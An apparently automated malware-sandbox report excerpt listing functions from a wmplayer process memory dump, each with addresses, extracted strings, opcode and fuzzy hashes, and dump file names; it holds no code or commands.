Opcode ID: a90906843236830fac01592007f416709af6b63a54920cb65e924a83fcd4ba45
Instruction ID: f58a7da913ced0b53f3222e12ead07d42e8552baa03ea3fd63c91ab1a1154fc0
Opcode Fuzzy Hash: a90906843236830fac01592007f416709af6b63a54920cb65e924a83fcd4ba45
Instruction Fuzzy Hash: 34419D35A04649DBDB15CFA9C840B69B7F4FF86704F1844E6EC44DB391E679D900CB92

Function 0386329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON

Download Yara Rule

Strings

.Local\, xrefs: 038632B5
@, xrefs: 0386330D

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID: .Local\$@
API String ID: 0-380025441
Opcode ID: ad63a33d2748cb377513435df05dac07908b9d970b8ee19bdf4f4f71ea2e0dab
Instruction ID: ad91328e7b9cc7fbe526a92f0442a0746b91124e58c075facfeea6e9b808123f
Opcode Fuzzy Hash: ad63a33d2748cb377513435df05dac07908b9d970b8ee19bdf4f4f71ea2e0dab
Instruction Fuzzy Hash: 9931A17A5087089FC321DF68D980A5BBBE8EBC5654F4809AEF595C7260DA70DD04CB93

Function 0383C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 0383C8C3, 0383CA40

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: f9c43cf8a3e378db077bf83529d27d1a195e8d1868ff72013323bc5a4d93f57a
Instruction ID: 4d3de6d75c5cb163c21434795bac5585ba81708245d893d4ba7a36c5175babc3
Opcode Fuzzy Hash: f9c43cf8a3e378db077bf83529d27d1a195e8d1868ff72013323bc5a4d93f57a
Instruction Fuzzy Hash: 38823975E002189BDB24CFE9C880BEDF7B5BF4A714F1881A9E859EB350D770A945CB90

Function 03837370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37f6005300e440ff76106b56a7911663b72d6b724d5779d8cff2aa2cf5d54b46
Instruction ID: d198f4a254f28ee961ea63a92eed4db949d7343174e26e9554470e637b4c5567
Opcode Fuzzy Hash: 37f6005300e440ff76106b56a7911663b72d6b724d5779d8cff2aa2cf5d54b46
Instruction Fuzzy Hash: 0CA18EB5608346CFD724DFA8C480A2ABBE5BF89304F1449AEF585DB350E770E945CB92

Function 038BF7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

@, xrefs: 038BF867

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
Instruction ID: 1202c43be675574f2297d8c648883b681b436c41f59a3412064a2f97572cbd5e
Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
Instruction Fuzzy Hash: F1518B72604346AFD721DF98CC40FAAB7F8FB84754F0409A9BA44DB290D7B4E914CB92

Function 038EB256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 038EB28F

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID: PreferredUILanguages
API String ID: 0-1884656846
Opcode ID: 3bf0a8592b6430dcd3999ce1e5361edf957c9e9ec5571a5ea59e2712210a4d41
Instruction ID: c31f204f060c12ef70908ad20e3f2bdd155095dfe2c2b13f63c65b4bb5a538b4
Opcode Fuzzy Hash: 3bf0a8592b6430dcd3999ce1e5361edf957c9e9ec5571a5ea59e2712210a4d41
Instruction Fuzzy Hash: B441D336D04219ABCF12DAD8C841BEEF7F9EF86710F0501A6E911EB254D6B0DE40C7A1

Function 038B97A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

verifier.dll, xrefs: 038B9870

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID: verifier.dll
API String ID: 0-3265496382
Opcode ID: 1ab3608add30777c5a45592005008081e29df3501a9e120a4da427506f9aa99e
Instruction ID: 19a686add2578541b91526678bd9dd3457a244541128c086a32a984e2c9cb122
Opcode Fuzzy Hash: 1ab3608add30777c5a45592005008081e29df3501a9e120a4da427506f9aa99e
Instruction Fuzzy Hash: CB3172756007029FDB34DFA99860AB6B7F9EB49710F5980BAE609DF385E7318C80C790

Function 038D705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

kLsE, xrefs: 038D70A4

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID: kLsE
API String ID: 0-3058123920
Opcode ID: 796a15376236dae0e5da734a92adbc46b34f58103cd26a33acb4c95b070c163d
Instruction ID: 1a95bbd630c66898933d9992ca6023a15d7f92e631721005091e8b30522b6f12
Opcode Fuzzy Hash: 796a15376236dae0e5da734a92adbc46b34f58103cd26a33acb4c95b070c163d
Instruction Fuzzy Hash: AE418936509B504AE731FFE9E884B697B94AB51724F180298FC60CF1C9CBB44885C792

Function 03835096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

Actx , xrefs: 038350BF

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 51d263b4fba2d3c4cbbe9f3ef5222b4131fee6e82a724165e241b424b3af8e11
Instruction ID: ad5ea18ba3d60a5cac6786c3e8c930a3cb3493328b11ab260206bd5d98fe87f0
Opcode Fuzzy Hash: 51d263b4fba2d3c4cbbe9f3ef5222b4131fee6e82a724165e241b424b3af8e11
Instruction Fuzzy Hash: B01166307055069BEB24C99D88706BAF2D5EB97268F3C85EAD451CB391D673D841C7C0

Function 0388739A Relevance: .7, Instructions: 705COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2849b10a6e3a94615ca30e6dec950b065fa078a9a598eca4179c5d0a4beebbec
Instruction ID: 66081592878967289cb17bef4cb7fd59b03426401a47a773212a1732bc3fe53d
Opcode Fuzzy Hash: 2849b10a6e3a94615ca30e6dec950b065fa078a9a598eca4179c5d0a4beebbec
Instruction Fuzzy Hash: F542A275A006168FDB14EF99C4806BEF7B6FF88314B2885ADE552EB340D734E942CB90

Function 0385B2C0 Relevance: .6, Instructions: 629COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d71061b58c6c017f9ab68c66ba7676c77b084861489f3d6b15e0a867c76d5f2b
Instruction ID: 511e5ddbac62605e2d6b2e763ea02d92fc4e57c1675cae135ce58a5863c27cae
Opcode Fuzzy Hash: d71061b58c6c017f9ab68c66ba7676c77b084861489f3d6b15e0a867c76d5f2b
Instruction Fuzzy Hash: F5329F76E01219DBCF25DFA8C880BAEBBB1FF54714F1800A9E805EB391E7759901CB91

Function 038DA118 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b01c246dcab430f93bc5d2ff31ac216f89da2f9bc6a9a355fdb81d8628eda965
Instruction ID: 642437de51cc6828594a16173d23e8aa310725ac4b4f251059a550c771de396c
Opcode Fuzzy Hash: b01c246dcab430f93bc5d2ff31ac216f89da2f9bc6a9a355fdb81d8628eda965
Instruction Fuzzy Hash: EC22CE742046558BDB2CCFA9C090772B7F1AF45304F2888DAE896CF685E73DE552CB61

Function 03828397 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b2af77116f3c1bf93e598d488f862817ba1ea702508c2ffdba4c1ab0c8aed00
Instruction ID: 82278b8e526b7730966da59012e6d1f026d8a441a25e0b210bff73cbcc3142ed
Opcode Fuzzy Hash: 4b2af77116f3c1bf93e598d488f862817ba1ea702508c2ffdba4c1ab0c8aed00
Instruction Fuzzy Hash: 98D1D775A0072A9FCF15DFE8C890ABABBE5FF84304F0846A9E915DB280E734D985C751

Function 0383D7E0 Relevance: .3, Instructions: 342COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56e53d3043fe92c8a85c33ad2c6bb12012a05256b341928424f8f086b491ba92
Instruction ID: 7ba34e310e10ca132784bddbea13d3082229cbdce25be8986c581844f82fd36d
Opcode Fuzzy Hash: 56e53d3043fe92c8a85c33ad2c6bb12012a05256b341928424f8f086b491ba92
Instruction Fuzzy Hash: E1C18071E006159BEF28CF9AC840BAEF7B5EB55314F1882E9D815EB394D770A946CBC0

Function 038590DB Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: aecee80bb438e39a2df936cfee00da10808d64e11e0b0d31d240d419ecdb7834
Instruction ID: d0a0eca2f77328449ad80f7aa043ccb1084af97fcfb100bf1f31e92df36ad8bc
Opcode Fuzzy Hash: aecee80bb438e39a2df936cfee00da10808d64e11e0b0d31d240d419ecdb7834
Instruction Fuzzy Hash: 55A12A75900619AFEF12EFA8CC41BAE77B9AF45750F054094F900EF2A0D775D850CBA5

Function 038383C0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b67fdb555a8438c05355ba54c7dd92854d8d82d980a2779344b97231be7ca05
Instruction ID: d649dcf5e03270558441df4bc9d31d0f8cfdae0becf62cb7b730b612ce7979a3
Opcode Fuzzy Hash: 4b67fdb555a8438c05355ba54c7dd92854d8d82d980a2779344b97231be7ca05
Instruction Fuzzy Hash: 57C139741083418FDB64CF59C484BAAB7E5BF88304F48499EE989CB391D774EA48CF92

Function 03870185 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24211a1de2c32bcc1d522c06c680589c7fb1200a07a7e15e5e6487054865ba10
Instruction ID: 6606d7aa4be9f0ac9a663b6badfdba813e760d3a4d11d8ee83691ff704a0aa54
Opcode Fuzzy Hash: 24211a1de2c32bcc1d522c06c680589c7fb1200a07a7e15e5e6487054865ba10
Instruction Fuzzy Hash: 76A1B2B1B00B19DBDB24DFA9C990BAAB7F6FF44318F0441A9EA45DB281DB34E901C750

Function 0384E3F0 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89c9f2023601be0be4df687337cb67f582485190ad2c23987f1bf26c2daafa8c
Instruction ID: 8d092074881fa7e700910a4aa206f408b194ff25c634230d803ca3e0df2bbf29
Opcode Fuzzy Hash: 89c9f2023601be0be4df687337cb67f582485190ad2c23987f1bf26c2daafa8c
Instruction Fuzzy Hash: AA91E435A00A198BEB24EBE8D844B7DB7A5FF84714F1A40EAE805DFA44E734E941C791

Function 03831131 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30379322fc5a45e68479245bd427eb0d906724220b5c2ac25176bc4c57a0370e
Instruction ID: c54a17d5f1253f3fffd3da88d457ad1790035b12b5c162fd3c15065c0516f622
Opcode Fuzzy Hash: 30379322fc5a45e68479245bd427eb0d906724220b5c2ac25176bc4c57a0370e
Instruction Fuzzy Hash: 6CB111756093408FD364DF68C480A5AFBE1BF89704F1849AEF999CB352D370E945CB82

Function 0385D090 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
Instruction ID: 25068366e0c397f6f81a6f80546ac01c4b79f729b346a68d8c630d22cc5b2bd4
Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
Instruction Fuzzy Hash: 33814B76E001198BEF14DE9CC9807ADFBB2FB84244F1D81AADC16EB344D635AA44CB91

Function 0386E284 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dc5b5954caeffdceee693550875a876566246c340eec715a460943e597562b5
Instruction ID: ce1875aa831ebe4e39a6a11676ba3a279601b2653b2b609a6bd24e843c2a02a1
Opcode Fuzzy Hash: 0dc5b5954caeffdceee693550875a876566246c340eec715a460943e597562b5
Instruction Fuzzy Hash: 0A817E75A00709AFDB21CFE8C980AEEF7BAFB88354F144469E555E7250DB30AC05CB60

Function 038B035C Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
Instruction ID: 7c7a8946825c25e9def464743e222479a367bb2891a095689037dbad8d359588
Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
Instruction Fuzzy Hash: 5C715EB5A0061AEFCB10DFE9C984ADEBBB9FF48700F1445A9E505EB650DB34EA01CB50

Function 038C62A0 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 996c6d588f9e078e6f8a4242326751a86649d7aeb6feb35ed0186c6c1815fd5f
Instruction ID: 0669acd9cf2523f8f45234d2f00cd14020bfb650fa6f77780d2f1ed0c91aaf0e
Opcode Fuzzy Hash: 996c6d588f9e078e6f8a4242326751a86649d7aeb6feb35ed0186c6c1815fd5f
Instruction Fuzzy Hash: 7871F236210B45EFDB31DFA8C844F6AB7A6EF84724F1848ACE155CB6A0E774E944CB50

Function 038F132D Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c80cb6c654f3a78efef1338952cfddabee062ad737b2c2a0f24e03971c1df182
Instruction ID: dfc74398d2c5e772e7eab1011212bdb97b356979cf88c9b8df3556edea05e8b4
Opcode Fuzzy Hash: c80cb6c654f3a78efef1338952cfddabee062ad737b2c2a0f24e03971c1df182
Instruction Fuzzy Hash: FF819075A00609DFCB09CFA8C494AAEB7F1FF88300F1981A9D859EB341D734EA41CB90

Function 038F903E Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3250cf024880870faa9c5ad1c26047e068f1f29bab5294ff4f285e687626646f
Instruction ID: 2273140ae4edc3b4749dafbc22235ce0d01fe021dca60118836202fe99fed868
Opcode Fuzzy Hash: 3250cf024880870faa9c5ad1c26047e068f1f29bab5294ff4f285e687626646f
Instruction Fuzzy Hash: C461FF75600715AFD715DFA8C884FABBBA9FF88314F044699FA68CB240DB30E514CB92

Function 038F92A6 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 452edfbfcf0e94ae9579f2424e653f9f0e782d4fcd20f6cafa21f2e1fa618322
Instruction ID: 6406965f086ba6e9c82f1113a33b4eba4c353da444db4f8b0277176e79e13ef5
Opcode Fuzzy Hash: 452edfbfcf0e94ae9579f2424e653f9f0e782d4fcd20f6cafa21f2e1fa618322
Instruction Fuzzy Hash: 1761D2356047428FD311CFE8C494B6AB7E0BF90718F1844EDEA95CB291DB75E806CB92

Function 0382B2D3 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 261628b4c0ce8484c6031211770c0ce0fbb28df667791e2b91efc709e5564ff0
Instruction ID: 79918b16966348f003755fa3e4d4aa25a61bfede3ae6371f7e18e2b77f42e50c
Opcode Fuzzy Hash: 261628b4c0ce8484c6031211770c0ce0fbb28df667791e2b91efc709e5564ff0
Instruction Fuzzy Hash: 52412375601B14AFCB26EFA9D880B2ABBA9EF40720F1544E9E549CF250DB70DC80CB90

Function 03837152 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

